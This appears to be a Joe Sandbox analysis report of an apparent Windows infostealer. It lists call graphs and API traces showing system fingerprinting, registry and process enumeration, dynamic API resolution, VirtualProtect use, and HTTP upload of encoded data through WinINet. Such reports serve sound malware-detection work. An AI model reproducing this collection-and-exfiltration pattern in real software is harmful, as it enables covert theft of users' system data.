14904->14905 15541 507b00 GetUserDefaultLocaleName 14905->15541 14908 50a9b0 4 API calls 14909 501f0e 14908->14909 14910 50a8a0 lstrcpy 14909->14910 14911 501f17 14910->14911 14912 50a9b0 4 API calls 14911->14912 14913 501f36 14912->14913 14914 50a8a0 lstrcpy 14913->14914 14915 501f3f 14914->14915 14916 50a9b0 4 API calls 14915->14916 14917 501f60 14916->14917 14918 50a8a0 lstrcpy 14917->14918 14919 501f69 14918->14919 15545 507b90 14919->15545 14921 501f80 14922 50a920 3 API calls 14921->14922 14923 501f93 14922->14923 14924 50a8a0 lstrcpy 14923->14924 14925 501f9c 14924->14925 14926 50a9b0 4 API calls 14925->14926 14927 501fc6 14926->14927 14928 50a8a0 lstrcpy 14927->14928 14929 501fcf 14928->14929 14930 50a9b0 4 API calls 14929->14930 14931 501fef 14930->14931 14932 50a8a0 lstrcpy 14931->14932 14933 501ff8 14932->14933 15557 507d80 GetSystemPowerStatus 14933->15557 14936 50a9b0 4 API calls 14937 502018 14936->14937 14938 50a8a0 lstrcpy 14937->14938 14939 502021 14938->14939 14940 50a9b0 4 API calls 14939->14940 14941 502040 14940->14941 14942 50a8a0 lstrcpy 14941->14942 14943 502049 14942->14943 14944 50a9b0 4 API calls 14943->14944 14945 50206a 14944->14945 14946 50a8a0 lstrcpy 14945->14946 14947 502073 14946->14947 14948 50207e GetCurrentProcessId 14947->14948 15559 509470 OpenProcess 14948->15559 14951 50a920 3 API calls 14952 5020a4 14951->14952 14953 50a8a0 lstrcpy 14952->14953 14954 5020ad 14953->14954 14955 50a9b0 4 API calls 14954->14955 14956 5020d7 14955->14956 14957 50a8a0 lstrcpy 14956->14957 14958 5020e0 14957->14958 14959 50a9b0 4 API calls 14958->14959 14960 502100 14959->14960 14961 50a8a0 lstrcpy 14960->14961 14962 502109 14961->14962 15564 507e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14962->15564 14965 50a9b0 4 API calls 14966 502129 14965->14966 14967 50a8a0 lstrcpy 14966->14967 14968 502132 14967->14968 14969 50a9b0 4 API calls 14968->14969 14970 502151 14969->14970 14971 50a8a0 lstrcpy 14970->14971 14972 50215a 14971->14972 14973 50a9b0 4 API calls 14972->14973 14974 50217b 14973->14974 14975 50a8a0 lstrcpy 14974->14975 14976 502184 14975->14976 15568 507f60 14976->15568 14979 50a9b0 4 API calls 14980 5021a4 14979->14980 14981 50a8a0 lstrcpy 14980->14981 14982 5021ad 14981->14982 14983 50a9b0 4 API calls 14982->14983 14984 5021cc 14983->14984 14985 50a8a0 lstrcpy 14984->14985 14986 5021d5 14985->14986 14987 50a9b0 4 API calls 14986->14987 14988 5021f6 14987->14988 14989 50a8a0 lstrcpy 14988->14989 14990 5021ff 14989->14990 15581 507ed0 GetSystemInfo wsprintfA 14990->15581 14993 50a9b0 4 API calls 14994 50221f 14993->14994 14995 50a8a0 lstrcpy 14994->14995 14996 502228 14995->14996 14997 50a9b0 4 API calls 14996->14997 14998 502247 14997->14998 14999 50a8a0 lstrcpy 14998->14999 15000 502250 14999->15000 15001 50a9b0 4 API calls 15000->15001 15002 502270 15001->15002 15003 50a8a0 lstrcpy 15002->15003 15004 502279 15003->15004 15583 508100 GetProcessHeap RtlAllocateHeap 15004->15583 15007 50a9b0 4 API calls 15008 502299 15007->15008 15009 50a8a0 lstrcpy 15008->15009 15010 5022a2 15009->15010 15011 50a9b0 4 API calls 15010->15011 15012 5022c1 15011->15012 15013 50a8a0 lstrcpy 15012->15013 15014 5022ca 15013->15014 15015 50a9b0 4 API calls 15014->15015 15016 5022eb 15015->15016 15017 50a8a0 lstrcpy 15016->15017 15018 5022f4 15017->15018 15589 5087c0 15018->15589 15021 50a920 3 API calls 15022 50231e 15021->15022 15023 50a8a0 lstrcpy 15022->15023 15024 502327 15023->15024 15025 50a9b0 4 API calls 15024->15025 15026 502351 15025->15026 15027 50a8a0 lstrcpy 15026->15027 15028 50235a 15027->15028 15029 50a9b0 4 API calls 15028->15029 15030 50237a 15029->15030 15031 50a8a0 lstrcpy 15030->15031 15032 502383 15031->15032 15033 50a9b0 4 API calls 15032->15033 15034 5023a2 15033->15034 15035 50a8a0 lstrcpy 15034->15035 15036 5023ab 15035->15036 15594 5081f0 15036->15594 15038 5023c2 15039 50a920 3 API calls 15038->15039 15040 5023d5 15039->15040 15041 50a8a0 lstrcpy 15040->15041 15042 5023de 15041->15042 15043 50a9b0 4 API calls 15042->15043 15044 50240a 15043->15044 15045 50a8a0 lstrcpy 15044->15045 15046 502413 15045->15046 15047 50a9b0 4 API calls 15046->15047 15048 502432 15047->15048 15049 50a8a0 lstrcpy 15048->15049 15050 50243b 15049->15050 15051 50a9b0 4 API calls 15050->15051 15052 50245c 15051->15052 15053 50a8a0 lstrcpy 15052->15053 15054 502465 15053->15054 15055 50a9b0 4 API calls 15054->15055 15056 502484 15055->15056 15057 50a8a0 lstrcpy 15056->15057 15058 50248d 15057->15058 15059 50a9b0 4 API calls 15058->15059 15060 5024ae 15059->15060 15061 50a8a0 lstrcpy 15060->15061 15062 5024b7 15061->15062 15602 508320 15062->15602 15064 5024d3 15065 50a920 3 API calls 15064->15065 15066 5024e6 15065->15066 15067 50a8a0 lstrcpy 15066->15067 15068 5024ef 15067->15068 15069 50a9b0 4 API calls 15068->15069 15070 502519 15069->15070 15071 50a8a0 lstrcpy 15070->15071 15072 502522 15071->15072 15073 50a9b0 4 API calls 15072->15073 15074 502543 15073->15074 15075 50a8a0 lstrcpy 15074->15075 15076 50254c 15075->15076 15077 508320 17 API calls 15076->15077 15078 502568 15077->15078 15079 50a920 3 API calls 15078->15079 15080 50257b 15079->15080 15081 50a8a0 lstrcpy 15080->15081 15082 502584 15081->15082 15083 50a9b0 4 API calls 15082->15083 15084 5025ae 15083->15084 15085 50a8a0 lstrcpy 15084->15085 15086 5025b7 15085->15086 15087 50a9b0 4 API calls 15086->15087 15088 5025d6 15087->15088 15089 50a8a0 lstrcpy 15088->15089 15090 5025df 15089->15090 15091 50a9b0 4 API calls 15090->15091 15092 502600 15091->15092 15093 50a8a0 lstrcpy 15092->15093 15094 502609 15093->15094 15638 508680 15094->15638 15096 502620 15097 50a920 3 API calls 15096->15097 15098 502633 15097->15098 15099 50a8a0 lstrcpy 15098->15099 15100 50263c 15099->15100 15101 50265a lstrlen 15100->15101 15102 50266a 15101->15102 15103 50a740 lstrcpy 15102->15103 15104 50267c 15103->15104 15105 4f1590 lstrcpy 15104->15105 15106 50268d 15105->15106 15648 505190 15106->15648 15108 502699 15108->13540 15836 50aad0 15109->15836 15111 4f5009 InternetOpenUrlA 15115 4f5021 15111->15115 15112 4f502a InternetReadFile 15112->15115 15113 4f50a0 InternetCloseHandle InternetCloseHandle 15114 4f50ec 15113->15114 15114->13544 15115->15112 15115->15113 15837 4f98d0 15116->15837 15118 500759 15119 500a38 15118->15119 15120 50077d 15118->15120 15121 4f1590 lstrcpy 15119->15121 15123 500799 StrCmpCA 15120->15123 15122 500a49 15121->15122 16013 500250 15122->16013 15125 5007a8 15123->15125 15150 500843 15123->15150 15127 50a7a0 lstrcpy 15125->15127 15129 5007c3 15127->15129 15128 500865 StrCmpCA 15130 500874 15128->15130 15168 50096b 15128->15168 15131 4f1590 lstrcpy 15129->15131 15132 50a740 lstrcpy 15130->15132 15133 50080c 15131->15133 15135 500881 15132->15135 15136 50a7a0 lstrcpy 15133->15136 15134 50099c StrCmpCA 15138 500a2d 15134->15138 15139 5009ab 15134->15139 15140 50a9b0 4 API calls 15135->15140 15137 500823 15136->15137 15141 50a7a0 lstrcpy 15137->15141 15138->13548 15142 4f1590 lstrcpy 15139->15142 15143 5008ac 15140->15143 15144 50083e 15141->15144 15145 5009f4 15142->15145 15146 50a920 3 API calls 15143->15146 15840 4ffb00 15144->15840 15148 50a7a0 lstrcpy 15145->15148 15149 5008b3 15146->15149 15151 500a0d 15148->15151 15152 50a9b0 4 API calls 15149->15152 15150->15128 15154 50a7a0 lstrcpy 15151->15154 15153 5008ba 15152->15153 15155 50a8a0 lstrcpy 15153->15155 15156 500a28 15154->15156 15168->15134 15488 50a7a0 lstrcpy 15487->15488 15489 4f1683 15488->15489 15490 50a7a0 lstrcpy 15489->15490 15491 4f1695 15490->15491 15492 50a7a0 lstrcpy 15491->15492 15493 4f16a7 15492->15493 15494 50a7a0 lstrcpy 15493->15494 15495 4f15a3 15494->15495 15495->14371 15497 4f47c6 15496->15497 15498 4f4838 lstrlen 15497->15498 15522 50aad0 15498->15522 15500 4f4848 InternetCrackUrlA 15501 4f4867 15500->15501 15501->14448 15503 50a740 lstrcpy 15502->15503 15504 508b74 15503->15504 15505 50a740 lstrcpy 15504->15505 15506 508b82 GetSystemTime 15505->15506 15507 508b99 15506->15507 15508 50a7a0 lstrcpy 15507->15508 15509 508bfc 15508->15509 15509->14463 15511 50a931 15510->15511 15512 50a988 15511->15512 15514 50a968 lstrcpy lstrcat 15511->15514 15513 50a7a0 lstrcpy 15512->15513 15515 50a994 15513->15515 15514->15512 15515->14466 15516->14581 15518 4f4eee 15517->15518 15519 4f9af9 LocalAlloc 15517->15519 15518->14469 15518->14472 15519->15518 15520 4f9b14 CryptStringToBinaryA 15519->15520 15520->15518 15521 4f9b39 LocalFree 15520->15521 15521->15518 15522->15500 15523->14591 15524->14732 15525->14734 15526->14742 15655 5077a0 15527->15655 15530 5076c6 RegOpenKeyExA 15532 507704 RegCloseKey 15530->15532 15533 5076e7 RegQueryValueExA 15530->15533 15531 501c1e 15531->14824 15532->15531 15533->15532 15535 501c99 15534->15535 15535->14838 15537 501e09 15536->15537 15537->14880 15539 501e84 15538->15539 15540 507a9a wsprintfA 15538->15540 15539->14894 15540->15539 15542 501efe 15541->15542 15543 507b4d 15541->15543 15542->14908 15662 508d20 LocalAlloc CharToOemW 15543->15662 15546 50a740 lstrcpy 15545->15546 15547 507bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15546->15547 15554 507c25 15547->15554 15548 507c46 GetLocaleInfoA 15548->15554 15549 507d18 15550 507d28 15549->15550 15551 507d1e LocalFree 15549->15551 15553 50a7a0 lstrcpy 15550->15553 15551->15550 15552 50a9b0 lstrcpy lstrlen lstrcpy lstrcat 15552->15554 15555 507d37 15553->15555 15554->15548 15554->15549 15554->15552 15556 50a8a0 lstrcpy 15554->15556 15555->14921 15556->15554 15558 502008 15557->15558 15558->14936 15560 509493 GetModuleFileNameExA CloseHandle 15559->15560 15561 5094b5 15559->15561 15560->15561 15562 50a740 lstrcpy 15561->15562 15563 502091 15562->15563 15563->14951 15565 502119 15564->15565 15566 507e68 RegQueryValueExA 15564->15566 15565->14965 15567 507e8e RegCloseKey 15566->15567 15567->15565 15569 507fb9 GetLogicalProcessorInformationEx 15568->15569 15570 507fd8 GetLastError 15569->15570 15572 508029 15569->15572 15571 508022 15570->15571 15579 507fe3 15570->15579 15573 502194 15571->15573 15576 5089f0 2 API calls 15571->15576 15577 5089f0 2 API calls 15572->15577 15573->14979 15576->15573 15578 50807b 15577->15578 15578->15571 15580 508084 wsprintfA 15578->15580 15579->15569 15579->15573 15663 5089f0 15579->15663 15666 508a10 GetProcessHeap RtlAllocateHeap 15579->15666 15580->15573 15582 50220f 15581->15582 15582->14993 15584 5089b0 15583->15584 15585 50814d GlobalMemoryStatusEx 15584->15585 15588 508163 __aulldiv 15585->15588 15586 50819b wsprintfA 15587 502289 15586->15587 15587->15007 15588->15586 15590 5087fb GetProcessHeap RtlAllocateHeap wsprintfA 15589->15590 15592 50a740 lstrcpy 15590->15592 15593 50230b 15592->15593 15593->15021 15595 50a740 lstrcpy 15594->15595 15599 508229 15595->15599 15596 508263 15598 50a7a0 lstrcpy 15596->15598 15597 50a9b0 lstrcpy lstrlen lstrcpy lstrcat 15597->15599 15600 5082dc 15598->15600 15599->15596 15599->15597 15601 50a8a0 lstrcpy 15599->15601 15600->15038 15601->15599 15603 50a740 lstrcpy 15602->15603 15604 50835c RegOpenKeyExA 15603->15604 15605 5083d0 15604->15605 15606 5083ae 15604->15606 15608 508613 RegCloseKey 15605->15608 15609 5083f8 RegEnumKeyExA 15605->15609 15607 50a7a0 lstrcpy 15606->15607 15613 5083bd 15607->15613 15612 50a7a0 lstrcpy 15608->15612 15610 50860e 15609->15610 15611 50843f wsprintfA RegOpenKeyExA 15609->15611 15610->15608 15614 5084c1 RegQueryValueExA 15611->15614 15615 508485 RegCloseKey RegCloseKey 15611->15615 15612->15613 15613->15064 15617 508601 RegCloseKey 15614->15617 15618 5084fa lstrlen 15614->15618 15616 50a7a0 lstrcpy 15615->15616 15616->15613 15617->15610 15618->15617 15619 508510 15618->15619 15620 50a9b0 4 API calls 15619->15620 15621 508527 15620->15621 15622 50a8a0 lstrcpy 15621->15622 15623 508533 15622->15623 15624 50a9b0 4 API calls 15623->15624 15625 508557 15624->15625 15626 50a8a0 lstrcpy 15625->15626 15627 508563 15626->15627 15628 50856e RegQueryValueExA 15627->15628 15628->15617 15629 5085a3 15628->15629 15630 50a9b0 4 API calls 15629->15630 15631 5085ba 15630->15631 15632 50a8a0 lstrcpy 15631->15632 15633 5085c6 15632->15633 15634 50a9b0 4 API calls 15633->15634 15635 5085ea 15634->15635 15636 50a8a0 lstrcpy 15635->15636 15637 5085f6 15636->15637 15637->15617 15639 50a740 lstrcpy 15638->15639 15640 5086bc CreateToolhelp32Snapshot Process32First 15639->15640 15641 5086e8 Process32Next 15640->15641 15642 50875d CloseHandle 15640->15642 15641->15642 15647 5086fd 15641->15647 15643 50a7a0 lstrcpy 15642->15643 15644 508776 15643->15644 15644->15096 15645 50a9b0 lstrcpy lstrlen lstrcpy lstrcat 15645->15647 15646 50a8a0 lstrcpy 15646->15647 15647->15641 15647->15645 15647->15646 15649 50a7a0 lstrcpy 15648->15649 15650 5051b5 15649->15650 15651 4f1590 lstrcpy 15650->15651 15652 5051c6 15651->15652 15667 4f5100 15652->15667 15654 5051cf 15654->15108 15658 507720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15655->15658 15657 5076b9 15657->15530 15657->15531 15659 507780 RegCloseKey 15658->15659 15660 507765 RegQueryValueExA 15658->15660 15661 507793 15659->15661 15660->15659 15661->15657 15662->15542 15664 5089f9 GetProcessHeap HeapFree 15663->15664 15665 508a0c 15663->15665 15664->15665 15665->15579 15666->15579 15668 50a7a0 lstrcpy 15667->15668 15669 4f5119 15668->15669 15670 4f47b0 2 API calls 15669->15670 15671 4f5125 15670->15671 15827 508ea0 15671->15827 15673 4f5184 15674 4f5192 lstrlen 15673->15674 15675 4f51a5 15674->15675 15676 508ea0 4 API calls 15675->15676 15677 4f51b6 15676->15677 15678 50a740 lstrcpy 15677->15678 15679 4f51c9 15678->15679 15680 50a740 lstrcpy 15679->15680 15681 4f51d6 15680->15681 15682 50a740 lstrcpy 15681->15682 15683 4f51e3 15682->15683 15684 50a740 lstrcpy 15683->15684 15685 4f51f0 15684->15685 15686 50a740 lstrcpy 15685->15686 15687 4f51fd InternetOpenA StrCmpCA 15686->15687 15688 4f522f 15687->15688 15689 4f58c4 InternetCloseHandle 15688->15689 15690 508b60 3 API calls 15688->15690 15696 4f58d9 ctype 15689->15696 15691 4f524e 15690->15691 15692 50a920 3 API calls 15691->15692 15693 4f5261 15692->15693 15694 50a8a0 lstrcpy 15693->15694 15695 4f526a 15694->15695 15697 50a9b0 4 API calls 15695->15697 15700 50a7a0 lstrcpy 15696->15700 15698 4f52ab 15697->15698 15699 50a920 3 API calls 15698->15699 15701 4f52b2 15699->15701 15708 4f5913 15700->15708 15702 50a9b0 4 API calls 15701->15702 15703 4f52b9 15702->15703 15704 50a8a0 lstrcpy 15703->15704 15705 4f52c2 15704->15705 15706 50a9b0 4 API calls 15705->15706 15707 4f5303 15706->15707 15709 50a920 3 API calls 15707->15709 15708->15654 15710 4f530a 15709->15710 15711 50a8a0 lstrcpy 15710->15711 15712 4f5313 15711->15712 15713 4f5329 InternetConnectA 15712->15713 15713->15689 15714 4f5359 HttpOpenRequestA 15713->15714 15716 4f58b7 InternetCloseHandle 15714->15716 15717 4f53b7 15714->15717 15716->15689 15718 50a9b0 4 API calls 15717->15718 15719 4f53cb 15718->15719 15720 50a8a0 lstrcpy 15719->15720 15721 4f53d4 15720->15721 15722 50a920 3 API calls 15721->15722 15723 4f53f2 15722->15723 15724 50a8a0 lstrcpy 15723->15724 15725 4f53fb 15724->15725 15726 50a9b0 4 API calls 15725->15726 15727 4f541a 15726->15727 15728 50a8a0 lstrcpy 15727->15728 15729 4f5423 15728->15729 15730 50a9b0 4 API calls 15729->15730 15731 4f5444 15730->15731 15732 50a8a0 lstrcpy 15731->15732 15733 4f544d 15732->15733 15734 50a9b0 4 API calls 15733->15734 15735 4f546e 15734->15735 15828 508ea9 15827->15828 15829 508ead CryptBinaryToStringA 15827->15829 15828->15673 15829->15828 15830 508ece GetProcessHeap RtlAllocateHeap 15829->15830 15830->15828 15831 508ef4 ctype 15830->15831 15832 508f05 CryptBinaryToStringA 15831->15832 15832->15828 15836->15111 16079 4f9880 15837->16079 15839 4f98e1 15839->15118 15841 50a740 lstrcpy 15840->15841 15842 4ffb16 15841->15842 16014 50a740 lstrcpy 16013->16014 16015 500266 16014->16015 16016 508de0 2 API calls 16015->16016 16017 50027b 16016->16017 16018 50a920 3 API calls 16017->16018 16019 50028b 16018->16019 16020 50a8a0 lstrcpy 16019->16020 16021 500294 16020->16021 16022 50a9b0 4 API calls 16021->16022 16080 4f988d 16079->16080 16083 4f6fb0 16080->16083 16082 4f98ad ctype 16082->15839 16086 4f6d40 16083->16086 16087 4f6d63 16086->16087 16101 4f6d59 16086->16101 16102 4f6530 16087->16102 16091 4f6dbe 16091->16101 16112 4f69b0 16091->16112 16093 4f6e2a 16094 4f6ee6 VirtualFree 16093->16094 16096 4f6ef7 16093->16096 16093->16101 16094->16096 16095 4f6f41 16099 5089f0 2 API calls 16095->16099 16095->16101 16096->16095 16097 4f6f38 16096->16097 16098 4f6f26 FreeLibrary 16096->16098 16100 5089f0 2 API calls 16097->16100 16098->16096 16099->16101 16100->16095 16101->16082 16103 4f6542 16102->16103 16105 4f6549 16103->16105 16122 508a10 GetProcessHeap RtlAllocateHeap 16103->16122 16105->16101 16106 4f6660 16105->16106 16111 4f668f VirtualAlloc 16106->16111 16108 4f6730 16109 4f673c 16108->16109 16110 4f6743 VirtualAlloc 16108->16110 16109->16091 16110->16109 16111->16108 16111->16109 16113 4f69c9 16112->16113 16117 4f69d5 16112->16117 16114 4f6a09 LoadLibraryA 16113->16114 16113->16117 16115 4f6a32 16114->16115 16114->16117 16119 4f6ae0 16115->16119 16123 508a10 GetProcessHeap RtlAllocateHeap 16115->16123 16117->16093 16118 4f6ba8 GetProcAddress 16118->16117 16118->16119 16119->16117 16119->16118 16120 5089f0 2 API calls 16120->16119 16121 4f6a8b 16121->16117 16121->16120 16122->16105 16123->16121

                                Executed Functions

                                Function 00509860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 509860-509874 call 509750 663 509a93-509af2 LoadLibraryA * 5 660->663 664 50987a-509a8e call 509780 GetProcAddress * 21 660->664 665 509af4-509b08 GetProcAddress 663->665 666 509b0d-509b14 663->666 664->663 665->666 668 509b46-509b4d 666->668 669 509b16-509b41 GetProcAddress * 2 666->669 671 509b68-509b6f 668->671 672 509b4f-509b63 GetProcAddress 668->672 669->668 673 509b71-509b84 GetProcAddress 671->673 674 509b89-509b90 671->674 672->671 673->674 675 509bc1-509bc2 674->675 676 509b92-509bbc GetProcAddress * 2 674->676 676->675
                                APIs
                                • GetProcAddress.KERNEL32(75900000,012D0840), ref: 005098A1
                                • GetProcAddress.KERNEL32(75900000,012D0690), ref: 005098BA
                                • GetProcAddress.KERNEL32(75900000,012D0558), ref: 005098D2
                                • GetProcAddress.KERNEL32(75900000,012D0678), ref: 005098EA
                                • GetProcAddress.KERNEL32(75900000,012D0570), ref: 00509903
                                • GetProcAddress.KERNEL32(75900000,012D8930), ref: 0050991B
                                • GetProcAddress.KERNEL32(75900000,012C6760), ref: 00509933
                                • GetProcAddress.KERNEL32(75900000,012C6920), ref: 0050994C
                                • GetProcAddress.KERNEL32(75900000,012D05A0), ref: 00509964
                                • GetProcAddress.KERNEL32(75900000,012D05B8), ref: 0050997C
                                • GetProcAddress.KERNEL32(75900000,012D05E8), ref: 00509995
                                • GetProcAddress.KERNEL32(75900000,012D0618), ref: 005099AD
                                • GetProcAddress.KERNEL32(75900000,012C6980), ref: 005099C5
                                • GetProcAddress.KERNEL32(75900000,012D06F0), ref: 005099DE
                                • GetProcAddress.KERNEL32(75900000,012D0630), ref: 005099F6
                                • GetProcAddress.KERNEL32(75900000,012C68E0), ref: 00509A0E
                                • GetProcAddress.KERNEL32(75900000,012D0660), ref: 00509A27
                                • GetProcAddress.KERNEL32(75900000,012D0918), ref: 00509A3F
                                • GetProcAddress.KERNEL32(75900000,012C69A0), ref: 00509A57
                                • GetProcAddress.KERNEL32(75900000,012D08B8), ref: 00509A70
                                • GetProcAddress.KERNEL32(75900000,012C6940), ref: 00509A88
                                • LoadLibraryA.KERNEL32(012D08A0,?,00506A00), ref: 00509A9A
                                • LoadLibraryA.KERNEL32(012D08D0,?,00506A00), ref: 00509AAB
                                • LoadLibraryA.KERNEL32(012D0858,?,00506A00), ref: 00509ABD
                                • LoadLibraryA.KERNEL32(012D0870,?,00506A00), ref: 00509ACF
                                • LoadLibraryA.KERNEL32(012D0888,?,00506A00), ref: 00509AE0
                                • GetProcAddress.KERNEL32(75070000,012D0900), ref: 00509B02
                                • GetProcAddress.KERNEL32(75FD0000,012D08E8), ref: 00509B23
                                • GetProcAddress.KERNEL32(75FD0000,012D8F70), ref: 00509B3B
                                • GetProcAddress.KERNEL32(75A50000,012D8F28), ref: 00509B5D
                                • GetProcAddress.KERNEL32(74E50000,012C6840), ref: 00509B7E
                                • GetProcAddress.KERNEL32(76E80000,012D89B0), ref: 00509B9F
                                • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00509BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00509BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 2c578a0a4d40b496b4f730a156cd11256f05f007e54e58289d5934b0f8567186
                                • Instruction ID: acb10298b2003ecba963d62d8476555b1c83a7cb535353341ae4eefb1730cb26
                                • Opcode Fuzzy Hash: 2c578a0a4d40b496b4f730a156cd11256f05f007e54e58289d5934b0f8567186
                                • Instruction Fuzzy Hash: 37A14EB6504240BFF345DFA8ED8A9963BF9F7AC303704C51AA685C3264D73D9441CB5A
                                Function 004F45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 4f45c0-4f4695 RtlAllocateHeap 781 4f46a0-4f46a6 764->781 782 4f474f-4f47a9 VirtualProtect 781->782 783 4f46ac-4f474a 781->783 783->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004F479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F45E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F46AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F46B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F46C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F46D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F45C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F45DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F46CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F45D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F45F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F477B
                                Memory Dump Source
